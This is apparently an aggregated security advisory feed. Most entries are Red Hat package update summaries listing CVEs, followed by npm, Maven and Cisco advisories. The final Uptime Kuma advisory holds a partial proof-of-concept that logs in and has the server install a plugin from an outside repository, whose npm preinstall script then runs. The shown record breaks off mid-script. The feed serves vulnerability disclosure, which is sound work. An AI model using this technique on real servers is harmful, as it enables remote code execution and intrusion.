30.04.2024 03:00:00	redhat	[RHSA-2024:2568] grafana security update (moderate)	Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB.Security Fix(es):* grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)* grafana: vulnerable to authorization bypass (CVE-2024-1313)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2568
30.04.2024 03:00:00	redhat	[RHSA-2024:2569] grafana-pcp security update (important)	grafana-pcp is an open source Grafana plugin for PCP.Security Fix(es):* grafana-pcp: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2569
30.04.2024 03:00:00	redhat	[RHSA-2024:2272] containernetworking-plugins security update (moderate)	The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2272
30.04.2024 03:00:00	redhat	[RHSA-2024:2287] gstreamer1-plugins-bad-free security update (moderate)	GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-bad-free package contains a collection of plug-ins for GStreamer.Security Fix(es):* gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with uncompressed video (CVE-2023-40474)* gstreamer-plugins-bad: Integer overflow leading to heap overwrite in MXF file handling with AES3 audio (CVE-2023-40475)* gstreamer-plugins-bad: Integer overflow in H.265 video parser leading to stack overwrite (CVE-2023-40476)* gstreamer-plugins-bad-free: buffer overflow vulnerability (CVE-2023-50186)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2287
30.04.2024 03:00:00	redhat	[RHSA-2024:2289] libtiff security update (moderate)	The libtiff packages contain a library of functions for manipulating Tagged Image File Format (TIFF) files.Security Fix(es):* libtiff: infinite loop via a crafted TIFF file (CVE-2022-40090)* libtiff: segmentation fault in Fax3Encode in libtiff/tif_fax3.c (CVE-2023-3618)* libtiff: integer overflow in tiffcp.c (CVE-2023-40745)* libtiff: potential integer overflow in raw2tiff.c (CVE-2023-41175)* libtiff: heap-based buffer overflow in cpStripToTile() in tools/tiffcp.c (CVE-2023-6228)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2289
30.04.2024 03:00:00	redhat	[RHSA-2024:2290] mutt security update (moderate)	Mutt is a low resource, highly configurable, text-based MIME e-mail client. Mutt supports most e-mail storing formats, such as mbox and Maildir, as well as most protocols, including POP3 and IMAP.Security Fix(es):* mutt: null pointer dereference (CVE-2023-4874)* mutt: null pointer dereference (CVE-2023-4875)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2290
30.04.2024 03:00:00	redhat	[RHSA-2024:2292] python3.11 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2292
30.04.2024 03:00:00	redhat	[RHSA-2024:2570] gnutls security update (moderate)	The gnutls package provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: vulnerable to Minerva side-channel information leak (CVE-2024-28834)* gnutls: potential crash during chain building/verification (CVE-2024-28835)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2570
30.04.2024 03:00:00	redhat	[RHSA-2024:2295] libjpeg-turbo security update (moderate)	The libjpeg-turbo packages contain a library of functions for manipulating JPEG images. They also contain simple client programs for accessing the libjpeg functions. These packages provide the same functionality and API as libjpeg but with better performance.Security Fix(es):* libjpeg-turbo: heap-buffer-overflow vulnerability in decompress_smooth_data in jdcoefct.c (CVE-2021-29390)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2295
30.04.2024 03:00:00	redhat	[RHSA-2024:2298] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Use-after-free bug in DamageDestroy (CVE-2023-5574)* xorg-x11-server: Use-after-free bug in DestroyWindow (CVE-2023-5380)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2298
30.04.2024 03:00:00	redhat	[RHSA-2024:2302] gstreamer1-plugins-base security update (moderate)	GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-base packages contain a collection of well-maintained base plug-ins.Security Fix(es):* gstreamer-plugins-base: heap overwrite in subtitle parsing (CVE-2023-37328)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2302
30.04.2024 03:00:00	redhat	[RHSA-2024:2303] gstreamer1-plugins-good security update (moderate)	GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-good packages contain a collection of well-supported plug-ins of good quality and under the LGPL license.Security Fix(es):* gstreamer-plugins-good: integer overflow leading to heap overwrite in FLAC image tag handling (CVE-2023-37327)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2303
30.04.2024 03:00:00	redhat	[RHSA-2024:2337] python3.11-cryptography security update (moderate)	The python-cryptography packages contain a Python Cryptographic Authority's (PyCA's) cryptography library, which provides cryptographic primitives and recipes to Python developers.Security Fix(es):* python-cryptography: NULL-dereference when loading PKCS7 certificates (CVE-2023-49083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2337
30.04.2024 03:00:00	redhat	[RHSA-2024:2348] python-jinja2 security update (moderate)	The python-jinja2 package contains Jinja2, a template engine written in pure Python. Jinja2 provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment. Security Fix(es):* jinja2: HTML attribute injection when passing user input as keys to xmlattr filter (CVE-2024-22195)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2348
30.04.2024 03:00:00	redhat	[RHSA-2024:2366] freeglut security update (moderate)	freeglut is a completely open source alternative to the OpenGL Utility Toolkit (GLUT) library with an OSI approved free software license.Security Fix(es):* freeglut: memory leak via glutAddSubMenu() function (CVE-2024-24258)* freeglut: memory leak via glutAddMenuEntry() function (CVE-2024-24259)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2366
30.04.2024 03:00:00	redhat	[RHSA-2024:2368] mod_http2 security update (moderate)	The mod_http2 Apache httpd module implements the HTTP2 protocol (h2+h2c) on top of libnghttp2 for httpd 2.4 servers.Security Fix(es):* httpd: mod_http2: DoS in HTTP/2 with initial window size 0 (CVE-2023-43622)* mod_http2: reset requests exhaust memory (incomplete fix of CVE-2023-44487) (CVE-2023-45802)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2368
30.04.2024 03:00:00	redhat	[RHSA-2024:2387] mod_jk and mod_proxy_cluster security update (moderate)	The mod_jk module is a plugin for the Apache HTTP Server to connect it with the Apache Tomcat servlet engine.The mod_proxy_cluster module is a plugin for the Apache HTTP Server that provides load-balancer functionality.Security Fix(es):* httpd: Apache Tomcat Connectors (mod_jk) Information Disclosure (CVE-2023-41081)* mod_cluster/mod_proxy_cluster: Stored Cross site Scripting (CVE-2023-6710)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2387
30.04.2024 03:00:00	redhat	[RHSA-2024:2396] squashfs-tools security update (moderate)	SquashFS is a highly compressed read-only file system for Linux. These packages contain the utilities for manipulating squashfs file systems.Security Fix(es):* squashfs-tools: unvalidated filepaths allow writing outside of destination (CVE-2021-40153)* squashfs-tools: possible Directory Traversal via symbolic link (CVE-2021-41072)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2396
30.04.2024 03:00:00	redhat	[RHSA-2024:2433] avahi security update (moderate)	Avahi is an implementation of the DNS Service Discovery and Multicast DNS specifications for Zero Configuration Networking. It facilitates service discovery on a local network. Avahi and Avahi-aware applications allow you to plug your computer into a network and, with no configuration, view other people to chat with, view printers to print with, and find shared files on other computers.Security Fix(es):* avahi: Reachable assertion in avahi_dns_packet_append_record (CVE-2023-38469)* avahi: Reachable assertion in avahi_escape_label (CVE-2023-38470)* avahi: Reachable assertion in dbus_set_host_name (CVE-2023-38471)* avahi: Reachable assertion in avahi_rdata_parse (CVE-2023-38472)* avahi: Reachable assertion in avahi_alternative_host_name (CVE-2023-38473)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2433
30.04.2024 03:00:00	redhat	[RHSA-2024:2447] openssl and openssl-fips-provider security update (low)	OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.Security Fix(es):* openssl: AES-SIV cipher implementation contains a bug that causes it to ignore empty associated data entries (CVE-2023-2975)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* OpenSSL: Excessive time spent checking DH q parameter value (CVE-2023-3817)* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)* openssl: POLY1305 MAC implementation corrupts vector registers on PowerPC (CVE-2023-6129)* openssl: Excessive time spent checking invalid RSA public keys (CVE-2023-6237)* openssl: denial of service via null dereference (CVE-2024-0727)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2447
30.04.2024 03:00:00	redhat	[RHSA-2024:2456] grub2 security update (moderate)	The grub2 packages provide version 2 of the Grand Unified Boot Loader (GRUB), a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices.Security Fix(es):* grub2: grub2-set-bootflag can be abused by local (pseudo-)users (CVE-2024-1048)* grub2: Out-of-bounds write at fs/ntfs.c may lead to unsigned code execution (CVE-2023-4692)* grub2: out-of-bounds read at fs/ntfs.c (CVE-2023-4693)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2456
30.04.2024 03:00:00	redhat	[RHSA-2024:2463] systemd security update (moderate)	The systemd packages contain systemd, a system and service manager for Linux, compatible with the SysV and LSB init scripts. It provides aggressive parallelism capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, and keeps track of processes using Linux cgroups. In addition, it supports snapshotting and restoring of the system state, maintains mount and automount points, and implements an elaborate transactional dependency-based service control logic. It can also work as a drop-in replacement for sysvinit.Security Fix(es):* systemd-resolved: Unsigned name response in signed zone is not refused when DNSSEC=yes (CVE-2023-7008)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2463
30.04.2024 03:00:00	redhat	[RHSA-2024:2504] libssh security update (low)	libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* libssh: ProxyCommand/ProxyJump features allow injection of malicious code through hostname (CVE-2023-6004)* libssh: Missing checks for return values for digests (CVE-2023-6918)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2504
30.04.2024 03:00:00	redhat	[RHSA-2024:2512] file security update (low)	The file command is used to identify a particular file according to the type of data the file contains. It can identify many different file types, including Executable and Linkable Format (ELF) binary files, system libraries, RPM packages, and different graphics formats.Security Fix(es):* file: stack-based buffer over-read in file_copystr in funcs.c (CVE-2022-48554)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2512
30.04.2024 03:00:00	redhat	[RHSA-2024:2517] wpa_supplicant security update (moderate)	The wpa_supplicant packages contain an 802.1X Supplicant with support for WEP, WPA, WPA2 (IEEE 802.11i / RSN), and various EAP authentication methods. They implement key negotiation with a WPA Authenticator for client stations and controls the roaming and IEEE 802.11 authentication and association of the WLAN driver.Security Fix(es):* wpa_supplicant: potential authorization bypass (CVE-2023-52160)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2517
30.04.2024 03:00:00	redhat	[RHSA-2024:2528] mingw-glib2 security update (low)	GLib provides the core application building blocks for libraries and applications written in C. It provides the core object system used in GNOME, the main loop implementation, and a large set of utility functions for strings and common data structures.Security Fix(es):* glib: GVariant offset table entry size is not checked in is_normal() (CVE-2023-29499)* glib: g_variant_byteswap() can take a long time with some non-normal inputs (CVE-2023-32611)* glib: Timeout in fuzz_variant_text (CVE-2023-32636)* glib: GVariant deserialisation does not match spec for non-normal data (CVE-2023-32665)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2528
30.04.2024 03:00:00	redhat	[RHSA-2024:2548] podman security and bug fix update (moderate)	The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fixes:* podman: golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON (CVE-2024-24786)* podman: buildah: full container escape at build time (CVE-2024-1753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fixes:* liveness probe not called by podman when using httpGet (JIRA:RHEL-28633)* Unable to copy image from one virtual machine to another using "podman image scp" (JIRA:RHEL-28629)* [v4.9] Backport two docker CLI compatibility fixes (JIRA:RHEL-28636)* Issue in podman causing S2I to fail in overwriting ENTRYPOINT (JIRA:RHEL-14922)* Need to backport podman fix for SIGSEGV in RHEL 9.3/8.9 for UBI based containers (JIRA:RHEL-26843)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2548
30.04.2024 03:00:00	redhat	[RHSA-2024:2549] skopeo security and bug fix update (moderate)	The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es):* golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON (CVE-2024-24786)Bug Fix(es):* TRIAGE CVE-2024-24786 skopeo: golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON [rhel-9] - RHEL 9.4 0day (JIRA:RHEL-28235)* skopeo: jose-go: improper handling of highly compressed data [rhel-9] (JIRA:RHEL-28736)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2549
30.04.2024 03:00:00	redhat	[RHSA-2024:2551] bind security update (important)	The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)* bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)* bind: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)* bind: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)* bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)Bug Fix(es):* bind-dyndb-ldap: rebuilt to adapt ABI changes in bindFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2551
30.04.2024 03:00:00	redhat	[RHSA-2024:2560] libvirt security and bug fix update (moderate)	The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.Security Fixes:* libvirt: off-by-one error in udevListInterfacesByStatus() (CVE-2024-1441)* libvirt: negative g_new0 length can lead to unbounded memory allocation (CVE-2024-2494)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fixes:* libvirt: off-by-one error in udevListInterfacesByStatus() [rhel-9] (JIRA:RHEL-25081)* libvirt: negative g_new0 length can lead to unbounded memory allocation [rhel-9] (JIRA:RHEL-29515)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2560
30.04.2024 03:00:00	redhat	[RHSA-2024:2562] golang security update (important)	The golang packages provide the Go programming language compiler.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)* golang: net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect (CVE-2023-45289)* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)* golang: net/mail: comments in display names are incorrectly handled (CVE-2024-24784)* golang: html/template: errors returned from MarshalJSON methods may break template escaping (CVE-2024-24785)* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2562
30.04.2024 03:00:00	redhat	[RHSA-2024:2571] sssd security and bug fix update (moderate)	The System Security Services Daemon (SSSD) service provides a set of daemons to manage access to remote directories and authentication mechanisms. It also provides the Name Service Switch (NSS) and the Pluggable Authentication Modules (PAM) interfaces toward the system, and a pluggable back-end system to connect to multiple different account sources.Security Fix(es):* sssd: Race condition during authorization leads to GPO policies functioning inconsistently (CVE-2023-3758)Bug Fix(es):* socket leak (JIRA:RHEL-22340)* Passkey cannot fall back to password (JIRA:RHEL-28161)* sssd: Race condition during authorization leads to GPO policies functioning inconsistently (JIRA:RHEL-27209)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2571
30.04.2024 03:00:00	redhat	[RHSA-2024:2616] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: User-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2616
01.05.2024 20:05:55	npm	[NPM:GHSA-2XP3-57P7-QF4V] xml-crypto vulnerable to XML signature verification bypass due improper verification of signature/signature spoofing (critical)	### SummaryDefault configuration does not check authorization of the signer, it only checks the validity of the signature per section 3.2.2 of https://www.w3.org/TR/2008/REC-xmldsig-core-20080610/#sec-CoreValidation. As such, without additional validation steps, the default configuration allows a malicious actor to re-sign an XML document, place the certificate in a `<KeyInfo />` element, and pass `xml-crypto` default validation checks.### DetailsAffected `xml-crypto` versions between versions `>= 4.0.0` and `< 6.0.0`. `xml-crypto` trusts by default any certificate provided via digitally signed XML document's `<KeyInfo />`.`xml-crypto` prefers to use any certificate provided via digitally signed XML document's `<KeyInfo />` even if library was configured to use specific certificate (`publicCert`) for signature verification purposes.Attacker can spoof signature verification by modifying XML document and replacing existing signature with signature generated with malicious private key (created by attacker) and by attaching that private key's certificate to `<KeyInfo />` element.Vulnerability is combination of changes introduced to `4.0.0` at* https://github.com/node-saml/xml-crypto/pull/301* https://github.com/node-saml/xml-crypto/commit/c2b83f984049edb68ad1d7c6ad0739ec92af11caChanges at PR provided default method to extract certificate from signed XML document.* https://github.com/node-saml/xml-crypto/blob/c2b83f984049edb68ad1d7c6ad0739ec92af11ca/lib/signed-xml.js#L405-L414* https://github.com/node-saml/xml-crypto/blob/c2b83f984049edb68ad1d7c6ad0739ec92af11ca/lib/signed-xml.js#L334and changes at PR prefer output of that method to be used as certificate for signature verification even in the case when library is configured to use specific/pre-configured `signingCert`* https://github.com/node-saml/xml-crypto/blob/c2b83f984049edb68ad1d7c6ad0739ec92af11ca/lib/signed-xml.js#L507Name of the `signingCert` was changed later (but prior to `4.0.0` release) to `publicCert`:* https://github.com/node-saml/xml-crypto/commit/78329fbae34c9b25ba25882604e960f506d7c0e7* https://github.com/node-saml/xml-crypto/blob/78329fbae34c9b25ba25882604e960f506d7c0e7/lib/signed-xml.js#L507Issue was fixed to `6.0.0` by disabling implicit usage of default `getCertFromKeyInfo` implementation:* https://github.com/node-saml/xml-crypto/pull/445* https://github.com/node-saml/xml-crypto/commit/21201723d2ca9bc11288f62cf72552b7d659b000Possible workarounds for versions 4.x and 5.x:- Check the certificate extracted via `getCertFromKeyInfo` against trusted certificates before accepting the results of the validation.- Set `xml-crypto`'s `getCertFromKeyInfo` to `() => undefined` forcing `xml-crypto` to use an explicitly configured `publicCert` or `privateKey` for signature verification.### PoChttps://github.com/node-saml/xml-crypto/discussions/399### ImpactAn untrusted certificate can be used to pass a malicious XML payload through an improperly configured installation of `xml-crypto`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2XP3-57P7-QF4V
01.05.2024 19:40:05	maven	[MAVEN:GHSA-CHFM-68VV-PVW5] XMLUnit for Java has Insecure Defaults when Processing XSLT Stylesheets (low)	### ImpactWhen performing XSLT transformations XMLUnit for Java did not disable XSLT extension functions by default. Depending on the XSLT processor being used this could allow arbitrary code to be executed when XMLUnit is used to transform data with a stylesheet who's source can not be trusted. If the stylesheet can be provided externally this may even lead to a remote code execution.## PatchesUsers are advised to upgrade to XMLUnit for Java 2.10.0 where the default has been changed by means of https://github.com/xmlunit/xmlunit/commit/b81d48b71dfd2868bdfc30a3e17ff973f32bc15b### WorkaroundsXMLUnit's main use-case is performing tests on code that generates or processes XML. Most users will not use it to perform arbitrary XSLT transformations.Users running XSLT transformations with untrusted stylesheets should explicitly use XMLUnit's APIs to pass in a pre-configured TraX `TransformerFactory` with extension functions disabled via features and attributes. The required `setFactory` or `setTransformerFactory` methods have been available since XMLUnit for Java 2.0.0.### References[Bug Report](https://github.com/xmlunit/xmlunit/issues/264)[JAXP Security Guide](https://docs.oracle.com/en/java/javase/22/security/java-api-xml-processing-jaxp-security-guide.html#GUID-E345AA09-801E-4B95-B83D-7F0C452538AA)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CHFM-68VV-PVW5
01.05.2024 19:00:00	cisco	[CISCO-SA-IPPHONE-MULTI-VULNS-CXAHCVS] Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities (high)	Multiple vulnerabilities in Cisco IP Phone firmware could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition, gain unauthorized access, or view sensitive information on an affected system.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IPPHONE-MULTI-VULNS-CXAHCVS
01.05.2024 13:01:26	npm	[NPM:GHSA-7GRX-F945-MJ96] Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation (high)	### SummaryInstallation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.### DetailsUptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.After downloading a plugin, it's installed by calling `npm install` in the installation directory of the plugin:https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216Because the plugin is not validated against the official list of plugins or installed with `npm install --ignore-scripts`, a maliciously crafted plugin taking advantage of [npm scripts](https://docs.npmjs.com/cli/v9/using-npm/scripts) can gain remote code execution.### PoCIn the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty `index.js` and a `package.json` containing the script: `"preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc"`. This will be executed when installing the plugin.1. Start Uptime Kuma: `docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1`2. Create a user using the Uptime Kuma web interface, e.g. user `admin` with password `admin123`3. Confirm that the PoC file to be created doesn't exist yet:```➜ ~ docker exec -it uptime-kuma cat /tmp/poccat: /tmp/poc: No such file or directory```4. Create file `poc.js` with the following content:```SERVER = "ws://localhost:3001";USERNAME = "admin";PASSWORD = "admin123";const { io } = require("socket.io-client");const socket = io(SERVER);const repo = "https://github.com/n-thumann/npm-install-script-poc";const name = "npm-install-script-poc";socket.emit( "login", { username: USERNAME, password: PASSWORD, token: "" }, 